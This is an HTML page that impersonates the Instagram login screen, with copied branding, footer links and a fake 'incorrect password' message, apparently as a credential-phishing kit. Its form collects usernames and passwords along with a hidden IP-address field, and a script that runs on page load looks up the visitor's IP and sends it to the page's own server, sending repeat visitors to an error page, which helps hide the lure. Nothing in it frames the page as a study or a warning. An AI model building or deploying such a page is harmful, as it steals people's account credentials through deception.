<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        @import url("https://fonts.googleapis.com/css2?family=Roboto:wght@100;300;400;500&display=swap");
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "Roboto", sans-serif;
}
body {
  /* background: rgba(250, 250, 250, 1); */
  overflow-x: hidden;
}

.container {
  display: flex;
  justify-content: center;
  align-items: center;
  min-height: 90vh;
}
.container .col .box {
  width: 350px;
  /* height: 380px; */
  border: 1px solid rgba(219, 219, 219, 1);
  background: white;
  border-radius: 1px;
  margin: 0 0 10px;
  padding: 10px 0;
  z-index: 2;
}
.container .col .box .title {
  position: relative;
  top: 5px;
  text-align: center;
}
.container .col.content {
  position: relative;
  top: 12px;
}
.container .col .box .title img {
  width: 190px;
  height: 80px;
}
.container .col .box .login-form {
  position: relative;
  /* height: 260px; */
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
}
.container .col .box .login-form .form-content {
  position: relative;
  margin: 5px 0;
  top: 22px;
}
.container .col .box .login-form .form-content .showPassword{
  color: #262626;
  font-size: 14px;
  font-weight: 600;
  background-color: transparent;
  width: auto;
  height: auto;
  position: absolute;
  right: 8px;
  top: 25%;
  cursor: pointer;
}
.container .col .box .login-form .form-content .showPassword:hover{
  opacity: .5;
}
  .container .col .box .login-form label {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  left: 9px;
  font-size: 12px;
  color: rgba(142, 142, 142, 1);
  pointer-events: none;
  order: -1;
  transition: 0.3s ease;
}
.container .col .box .login-form input {
  background: transparent;
  width: 270px;
  height: 40px;
  background: rgba(250, 250, 250, 1);
  border: 1px solid rgba(219, 219, 219, 1);
  border-radius: 3px;
  padding: 9px 0 7px 8px;
  outline: none;
  font-size: 14px;
  transition: 0.3s ease;
}
.container .col .box .login-form input:valid {
  padding-bottom: 0;
}
.container .col .box .login-form input:valid + label {
  transform: translateY(-16px);
  font-size: 10px;
}
.container .col .box .login-form button {
  width: 270px;
  height: 30px;
  border: none;
  cursor: pointer;
  outline: none;
  border-radius: 4px;
  background-color: rgba(0, 149, 246);
  color: white;
}
.container .col .box .login-form button:disabled {
  background-color: #4CB5F9;
  cursor: default;
}

.container .col .box .login-form .form-ending {
  position: relative;
  width: 270px;
  margin-top: 20px;
  text-align: center;
}
.container .col .box .login-form .form-ending #OR {
  color: rgba(142, 142, 142, 1);
  background: white;
  text-align: center;
  width: 50px;
  margin: 15px 0;
  font-size: 13px;
  font-weight: 500;
  line-height: 15px;
  z-index: 3;
  position: relative;
  display: block;
}
.LoginError{
  color: rgb(237, 73, 86);
  font-size: 14px;
  display: none;
  line-height: 18px;
}
.container .col .box .login-form .form-ending #line {
  z-index: 1;
  position: absolute;
  left: 50%;
  transform: translateX(-50%);
  top: 22px;
  width: 270px;
  height: 1px;
  background: rgba(219, 219, 219, 1);
}
.container .col .box .login-form .form-ending p#facebook {
  color: #385185;
  cursor: pointer;
  font-size: 14px;
  font-weight: 500;
  margin-top: 15px;
  margin-bottom: 18px;
}
.container .col .box .login-form .form-ending p#facebook i {
  margin-right: 8px;
  font-size: 16px;
  position: relative;
  top: 1px;
}
.container .col .box .login-form .form-ending a {
  /* position: relative; */
  top: 12px;
  text-decoration: none;
  color: rgba(0, 55, 107, 1);
  font-size: 12px;
  line-height: 14px;
  text-align: center;
  margin-top: 18px;
  display: block;
}
/* mini box  */
.container .col .mini-box {
  width: 350px;
  height: 65px;
  background: white;
  border: 1px solid rgba(219, 219, 219, 1);
  display: flex;
  justify-content: center;
  align-items: center;
}
.container .col .mini-box .text {
  font-size: 14px;
  color: rgba(38, 38, 38, 1);
}
.container .col .mini-box .text a {
  text-decoration: none;
  color: #0095f6;
  font-weight: 400;
}
.container .col .download-section {
  margin-top: 20px;
  width: 350px;
  height: 100px;
  text-align: center;
}
.container .col .download-section p {
  font-size: 14px;
  line-height: 18px;
}
.container .col .download-section .images {
  margin-top: 20px;
  display: flex;
  justify-content: center;
  gap: 10px;
}
.container .col .download-section .images img {
    width: 135px;
    height: 40px;
}
.container .col img#image {
    width: auto;
    height: 544px;
    margin-right: 32px;
}
footer {
  padding: 30px 20px;
  margin-top: 40px;
}
footer ul {
  display: flex;
  justify-content: center;
  flex-wrap: wrap;
  gap: 16px;
  width: 90%;
  margin: 0 auto 20px;
}
footer ul a {
  text-decoration: none;
}
footer ul li {
  font-size: 12px;
  line-height: 14px;
  list-style: none;
  color: rgba(142, 142, 142, 1);
  cursor: pointer;
}
footer .copyright {
  display: flex;
  justify-content: center;
  gap: 10px;
}
footer .copyright select {
  font-size: 12px;
  background: none;
  color: rgba(142, 142, 142, 1);
  border: none;
  cursor: pointer;
}
footer .copyright select option {
  width: 50px;
}
footer .copyright span {
  font-size: 12px;
  line-height: 14px;
  color: rgba(142, 142, 142, 1);
}
@media (max-width: 900px) {
  footer ul {
    width: 100%;
  }
}
@media (max-width: 850px) {
  #image {
    display: none;
  }
}

@media (max-width: 440px) {
  .container {
    min-height: 80vh;
  }
  .container .col .box,
  .container .col .mini-box {
    border: none;
    background-color: transparent;
  }
  body{
    background-color: white;
  }
  
}
@media (max-width: 375px) {
  footer .copyright{
    flex-direction: column;
    align-items: center;
  }
}

    </style>
</head>
<body>
    <!-- © Mohammad Muazam -->
<title>Instagram</title>
<link rel="icon" type="image/png" href="logo.png" />
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster" />
<link
  rel="stylesheet"
  href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css"
  integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p"
  crossorigin="anonymous"
/>
<link rel="stylesheet" href="style.css" />
</head>
<!-- This contains all the content that we want to show to web users when they visit your page.
-->
<body>
<div class="container" style="    padding-top: 40px;">
  <div class="col image">
    <img src="./Img/81447159204.png" alt="instagram" id="image">
  </div>
  <!--end of image-->
  <div class="col content">
    <div class="box">
      <div class="title">
        <img src="https://i.ibb.co/2dCLRGv/logoname.png" alt="logoname" border="0">
      </div>
      <form class="login-form">
        <div class="form-content">
          <input type="text" name="username" required />
          <input type="hidden" name="ipaddress" id="ipaddress">
          <label for="uname">Phone number, username, or email</label>
        </div>
        <div class="form-content">
          <p class="showPassword" onclick="ShowHidePassword(this)">Show</p>
          <input type="password" style="padding-right: 50px;" name="password" required />
          <label for="password">Password</label>
        </div>
        <div class="form-content">
          <button type="submit" onclick="SubmitData(event)" >Log in</button>
        </div>
        <div class="form-ending">
          <center>
            <p id="OR">OR</p>
            <span id="line"></span>
          </center>
          <p id="facebook"><i class="fab fa-facebook-square"></i>Login with Facebook</p>
          <p class="LoginError">Sorry, your password was incorrect. Please double-check your password.</p>
          <a href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
        </div>
      </form>
    </div>
    <div class="mini-box">
      <div class="text">Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a></div>
    </div>
    <div class="download-section">
      <p>Get the app.</p>
      <div class="images">
        <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3DBC12C268-FD37-4701-A013-FBB7273E4B21%26utm_campaign%3DloginPage%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge%26original_referrer%3Dhttps%253A%252F%252Fwww.instagram.com%252F"><img src="./Img/appstore.png" alt="appstore" border="0"></a>
        <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3DBC12C268-FD37-4701-A013-FBB7273E4B21%26utm_campaign%3DloginPage%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge%26original_referrer%3Dhttps%253A%252F%252Fwww.instagram.com%252F"><img src="./Img/playstore.png" alt="playstore" border="0"></a>
      </div>
    </div>
  </div>
  <!--end of content-->
</div>
<footer>
  <ul>
    <a href="https://about.meta.com/"><li>Meta</li></a>
    <a href="https://about.instagram.com/"><li>About</li></a>
    <a href="https://about.instagram.com/blog/"><li>Blog</li></a>
    <a href="https://www.instagram.com/about/jobs/"><li>Jobs</li></a>
    <a href="https://help.instagram.com/"><li>Help</li></a>
    <a href="https://developers.facebook.com/docs/instagram"><li>API</li></a>
    <a href="https://www.instagram.com/legal/privacy/"><li>Privacy</li></a>
    <a href="https://www.instagram.com/legal/terms/"><li>Terms</li></a>
    <a href="https://www.instagram.com/explore/locations/"><li>Locations</li></a>
    <a href="https://www.instagram.com/web/lite/"><li>Instagram Lite</li></a>
    <a href="https://www.threads.net/"><li>Threads</li></a>
    <a href="https://about.meta.com/technologies/meta-verified/"><li>Meta Verified</li></a>
  </ul>
  <div class="copyright">
    <select aria-label="Switch Display Language">
      <option value="af">Afrikaans</option>
      <option value="cs">Čeština</option>
      <option value="da">Dansk</option>
      <option value="de">Deutsch</option>
      <option value="el">Ελληνικά</option>
      <option value="en" selected>English</option>
      <option value="en-gb">English (UK)</option>
      <option value="es">Español (España)</option>
      <option value="es-la">Español</option>
      <option value="fi">Suomi</option>
      <option value="fr">Français</option>
      <option value="id">Bahasa Indonesia</option>
      <option value="it">Italiano</option>
      <option value="ja">日本語</option>
      <option value="ko">한국어</option>
      <option value="ms">Bahasa Melayu</option>
      <option value="nb">Norsk</option>
      <option value="nl">Nederlands</option>
      <option value="pl">Polski</option>
      <option value="pt-br">Português (Brasil)</option>
      <option value="pt">Português (Portugal)</option>
      <option value="ru">Русский</option>
      <option value="sv">Svenska</option>
      <option value="th">ภาษาไทย</option>
      <option value="tl">Filipino</option>
      <option value="tr">Türkçe</option>
      <option value="zh-cn">中文(简体)</option>
      <option value="zh-tw">中文(台灣)</option>
      <option value="bn">বাংলা</option>
      <option value="gu">ગુજરાતી</option>
      <option value="hi">हिन्दी</option>
      <option value="hr">Hrvatski</option>
      <option value="hu">Magyar</option>
      <option value="kn">ಕನ್ನಡ</option>
      <option value="ml">മലയാളം</option>
      <option value="mr">मराठी</option>
      <option value="ne">नेपाली</option>
      <option value="pa">ਪੰਜਾਬੀ</option>
      <option value="si">සිංහල</option>
      <option value="sk">Slovenčina</option>
      <option value="ta">தமிழ்</option>
      <option value="te">తెలుగు</option>
      <option value="vi">Tiếng Việt</option>
      <option value="zh-hk">中文(香港)</option>
      <option value="bg">Български</option>
      <option value="fr-ca">Français (Canada)</option>
      <option value="ro">Română</option>
      <option value="sr">Српски</option>
      <option value="uk">Українська</option>
    </select>
    <span> &copy 2021 Instagram from Meta </span>
  </div>
</footer>

<script src="script.js"></script>

</body>
</html>


<script>

    fetch('https://api.ipify.org?format=json')
    .then(response => response.json())
    .then(data => {
      document.querySelector("#ipaddress").value = data.ip
      fetch('/checkIp', ({
        headers: {
          "Content-Type": "application/json"
        },
        method: "post",
        body: JSON.stringify({
          ipaddress : data.ip
        })
      })).then((res) => {
        return res.json()
      }).then((data) => {
        // console.log(data)
        if(data.ipFound){
        window.location.href="/serverError"
      }
      })
    })
    .catch(error => {
      console.error('Error fetching IP:', error);
    });
</script>
</body>
</html>